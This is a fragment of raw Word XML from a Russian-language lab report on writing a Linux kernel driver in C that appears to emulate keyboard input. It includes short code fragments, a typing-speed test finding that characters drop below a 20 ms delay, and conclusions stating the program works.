      <w:r w:rsidRPr="00B750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 remember beautiful moment, you come for me"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AB67DA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ype_string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d, text,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2000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с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= 2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екунды</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBBBAC3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F896E4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ничтожаем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стройство</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C190AD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octl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d, UI_DEV_DESTROY);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD8339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fd);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A40BDB0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B9F6DB" w14:textId="77777777" w:rsidR="00B7501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750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750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4E665F1" w14:textId="7B6460D0" w:rsidR="00C000C6" w:rsidRPr="00B75016" w:rsidRDefault="00B75016" w:rsidP="00B75016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750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873EAA3" w14:textId="77777777" w:rsidR="00C000C6" w:rsidRPr="00424F27" w:rsidRDefault="00C000C6" w:rsidP="006228AE">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2383C8CC" w14:textId="77777777" w:rsidR="009E515C" w:rsidRDefault="009E515C" w:rsidP="006228AE">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C449166" w14:textId="3D9BF7F2" w:rsidR="005D7C1A" w:rsidRPr="009E515C" w:rsidRDefault="00000000" w:rsidP="006228AE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Протоколы</w:t>
      </w:r>
      <w:r w:rsidRPr="009E515C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>логи</w:t>
      </w:r>
      <w:r w:rsidRPr="009E515C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>скриншоты</w:t>
      </w:r>
      <w:r w:rsidRPr="009E515C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>графики</w:t>
      </w:r>
      <w:r w:rsidR="006F6EB2" w:rsidRPr="009E515C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42353F42" w14:textId="50916132" w:rsidR="00C7037D" w:rsidRDefault="001F443D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1F443D">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Тесты.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B75016">
        <w:t xml:space="preserve">Был сгенерирован текст из 100 символов и </w:t>
      </w:r>
      <w:r w:rsidR="00D9053C">
        <w:t xml:space="preserve">изменялась скорость </w:t>
      </w:r>
      <w:r w:rsidR="004F3791">
        <w:t>задержки перед вводом символа.</w:t>
      </w:r>
      <w:r w:rsidR="00BC32D0">
        <w:t xml:space="preserve"> При скорости меньше </w:t>
      </w:r>
      <w:r w:rsidR="00E1010F">
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="00BC32D0">
        <w:t>млс были замечены пропуски символов</w:t>
      </w:r>
      <w:r w:rsidR="00F13A20">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C7037D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5163CAB5" w14:textId="3B157BA5" w:rsidR="00F427FA" w:rsidRPr="006228AE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006228AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Выводы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCFD2E9" w14:textId="484874A5" w:rsidR="00134F23" w:rsidRDefault="008C533D" w:rsidP="00FC650E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00067A8B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">В ходе лабораторной работы </w:t>
      </w:r>
      <w:r w:rsidR="00FC650E">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00FC650E" w:rsidRPr="00C370B4">
        <w:t>зуч</w:t>
      </w:r>
      <w:r w:rsidR="00FC650E">
        <w:t>ены</w:t>
      </w:r>
      <w:r w:rsidR="00FC650E" w:rsidRPr="00C370B4">
        <w:t xml:space="preserve"> основы разработки драйверов для ядра Linux с</w:t>
      </w:r>
      <w:r w:rsidR="00FC650E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC650E" w:rsidRPr="00C370B4">
        <w:t>использованием языка программирования C, включая настройку окружения,</w:t>
      </w:r>
      <w:r w:rsidR="00FC650E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC650E" w:rsidRPr="00C370B4">
        <w:t>создание драйвера и его тестирование.</w:t>
      </w:r>
      <w:r w:rsidR="00FC650E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4801DE78" w14:textId="77777777" w:rsidR="0015762E" w:rsidRDefault="0015762E" w:rsidP="00FC650E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17E42520" w14:textId="482C1E06" w:rsidR="0015762E" w:rsidRDefault="0015762E" w:rsidP="00FC650E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Полученная программа протестирована и работает исправно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5F5355" w14:textId="77777777" w:rsidR="00134F23" w:rsidRPr="00E17E8B" w:rsidRDefault="00134F23" w:rsidP="00934599">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pP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06E35"/>
    <w:rsid w:val="00067A8B"/>
    <w:rsid w:val="00096331"/>
    <w:rsid w:val="000A0E76"/>
    <w:rsid w:val="000A38D2"/>
    <w:rsid w:val="000C1C3A"/>
    <w:rsid w:val="000E654D"/>
    <w:rsid w:val="000F144B"/>
    <w:rsid w:val="00113DC9"/>
    <w:rsid w:val="00134F23"/>
    <w:rsid w:val="00143828"/>
    <w:rsid w:val="0015466C"/>
    <w:rsid w:val="0015762E"/>
    <w:rsid w:val="00171E6E"/>
    <w:rsid w:val="001854FE"/>
    <w:rsid w:val="00194419"/>
    <w:rsid w:val="001A2632"/>
    <w:rsid w:val="001A2A41"/>
    <w:rsid w:val="001C2E8F"/>
    <w:rsid w:val="001E3608"/>
    <w:rsid w:val="001F443D"/>
    <w:rsid w:val="001F680D"/>
    <w:rsid w:val="002379C6"/>
    <w:rsid w:val="0024045D"/>
    <w:rsid w:val="002526DF"/>
    <w:rsid w:val="00255AE7"/>
    <w:rsid w:val="00286E2E"/>
    <w:rsid w:val="002931E5"/>
    <w:rsid w:val="002B77B4"/>
    <w:rsid w:val="002D10BE"/>
    <w:rsid w:val="003340B8"/>
    <w:rsid w:val="003455B7"/>
    <w:rsid w:val="003B6A93"/>
    <w:rsid w:val="003D1234"/>
    <w:rsid w:val="003E03EC"/>
    <w:rsid w:val="00415091"/>
    <w:rsid w:val="00424F27"/>
    <w:rsid w:val="00440438"/>
    <w:rsid w:val="004454E5"/>
    <w:rsid w:val="004576BF"/>
    <w:rsid w:val="00461244"/>
    <w:rsid w:val="004615F4"/>
    <w:rsid w:val="00462CDE"/>
    <w:rsid w:val="00476623"/>
    <w:rsid w:val="004840F7"/>
    <w:rsid w:val="004A3A3F"/>
    <w:rsid w:val="004C57F4"/>
    <w:rsid w:val="004F3791"/>
    <w:rsid w:val="00502D22"/>
    <w:rsid w:val="00541728"/>
    <w:rsid w:val="00544245"/>
    <w:rsid w:val="005758A8"/>
    <w:rsid w:val="005814A6"/>
    <w:rsid w:val="005A7D7A"/>
    <w:rsid w:val="005C746F"/>
    <w:rsid w:val="005D0DF8"/>
    <w:rsid w:val="005D7C1A"/>
    <w:rsid w:val="0060393B"/>
    <w:rsid w:val="006228AE"/>
    <w:rsid w:val="00623AED"/>
    <w:rsid w:val="00676D89"/>
    <w:rsid w:val="006A6B5A"/>
    <w:rsid w:val="006C3A86"/>
    <w:rsid w:val="006D5E9D"/>
    <w:rsid w:val="006F6EB2"/>
    <w:rsid w:val="007010B7"/>
    <w:rsid w:val="00701CDA"/>
    <w:rsid w:val="00712624"/>
    <w:rsid w:val="00730B07"/>
    <w:rsid w:val="00741FBB"/>
    <w:rsid w:val="00744753"/>
    <w:rsid w:val="0075474C"/>
    <w:rsid w:val="00761D70"/>
    <w:rsid w:val="007702F0"/>
    <w:rsid w:val="007735FA"/>
    <w:rsid w:val="00784D5B"/>
    <w:rsid w:val="007C6326"/>
    <w:rsid w:val="007D70B1"/>
    <w:rsid w:val="007F2D81"/>
    <w:rsid w:val="007F652E"/>
    <w:rsid w:val="00812340"/>
    <w:rsid w:val="0081620B"/>
    <w:rsid w:val="00827A01"/>
    <w:rsid w:val="00871A71"/>
    <w:rsid w:val="00891C73"/>
    <w:rsid w:val="008A2A82"/>
    <w:rsid w:val="008C533D"/>
    <w:rsid w:val="008D7A75"/>
    <w:rsid w:val="008F59FE"/>
    <w:rsid w:val="0090182F"/>
    <w:rsid w:val="00934599"/>
    <w:rsid w:val="009554D1"/>
    <w:rsid w:val="0095574A"/>
    <w:rsid w:val="009649C8"/>
    <w:rsid w:val="009649EC"/>
    <w:rsid w:val="00980A30"/>
    <w:rsid w:val="00993F0C"/>
    <w:rsid w:val="009A51E6"/>
    <w:rsid w:val="009B33EE"/>
    <w:rsid w:val="009B7AAC"/>
    <w:rsid w:val="009E1746"/>
    <w:rsid w:val="009E515C"/>
    <w:rsid w:val="00A166D5"/>
    <w:rsid w:val="00A40FA3"/>
    <w:rsid w:val="00A651C6"/>
    <w:rsid w:val="00A86526"/>
    <w:rsid w:val="00AA38B5"/>
    <w:rsid w:val="00AA565A"/>
    <w:rsid w:val="00AA7447"/>
    <w:rsid w:val="00B0543C"/>
    <w:rsid w:val="00B340ED"/>
    <w:rsid w:val="00B35456"/>
    <w:rsid w:val="00B62881"/>
    <w:rsid w:val="00B75016"/>
    <w:rsid w:val="00B868B2"/>
    <w:rsid w:val="00B97626"/>
    <w:rsid w:val="00BB023C"/>
    <w:rsid w:val="00BC32D0"/>
    <w:rsid w:val="00BC6A58"/>
    <w:rsid w:val="00BE32E7"/>
    <w:rsid w:val="00BE3B0B"/>
    <w:rsid w:val="00C000C6"/>
    <w:rsid w:val="00C006C3"/>
    <w:rsid w:val="00C11048"/>
    <w:rsid w:val="00C12E88"/>
    <w:rsid w:val="00C31089"/>
    <w:rsid w:val="00C370B4"/>
    <w:rsid w:val="00C7037D"/>
    <w:rsid w:val="00C93251"/>
    <w:rsid w:val="00CB2549"/>
    <w:rsid w:val="00CB600B"/>
    <w:rsid w:val="00CC2537"/>
    <w:rsid w:val="00CC5202"/>
    <w:rsid w:val="00CE7052"/>
    <w:rsid w:val="00D008DF"/>
    <w:rsid w:val="00D175E6"/>
    <w:rsid w:val="00D321BF"/>
    <w:rsid w:val="00D521AD"/>
    <w:rsid w:val="00D6307D"/>
    <w:rsid w:val="00D9053C"/>
    <w:rsid w:val="00D97935"/>
    <w:rsid w:val="00DA0BED"/>
    <w:rsid w:val="00DA2E83"/>
    <w:rsid w:val="00DC2481"/>
    <w:rsid w:val="00DE5B98"/>
    <w:rsid w:val="00E1010F"/>
    <w:rsid w:val="00E17222"/>
    <w:rsid w:val="00E17E8B"/>
    <w:rsid w:val="00E31D14"/>
    <w:rsid w:val="00E32E53"/>
    <w:rsid w:val="00E36256"/>
    <w:rsid w:val="00E71C58"/>
    <w:rsid w:val="00E946D2"/>
    <w:rsid w:val="00EB6CEA"/>
    <w:rsid w:val="00EC1D06"/>
    <w:rsid w:val="00EC3D97"/>
    <w:rsid w:val="00EF19F6"/>
    <w:rsid w:val="00F13A20"/>
    <w:rsid w:val="00F30BE7"/>
    <w:rsid w:val="00F427FA"/>
    <w:rsid w:val="00F72613"/>
    <w:rsid w:val="00F755B9"/>
    <w:rsid w:val="00F81816"/>
    <w:rsid w:val="00F82048"/>
    <w:rsid w:val="00F97507"/>
    <w:rsid w:val="00FA64C8"/>
    <w:rsid w:val="00FC4D80"/>
    <w:rsid w:val="00FC650E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41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0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Дмитриев Андрей</cp:lastModifiedBy>
  <cp:revision>118</cp:revision>
  <cp:lastPrinted>2023-09-12T09:33:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-01T22:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-17T13:18:00Z</dcterms:modified>
  <dc:language>ru-RU</dc:language>
</cp:coreProperties>
</file>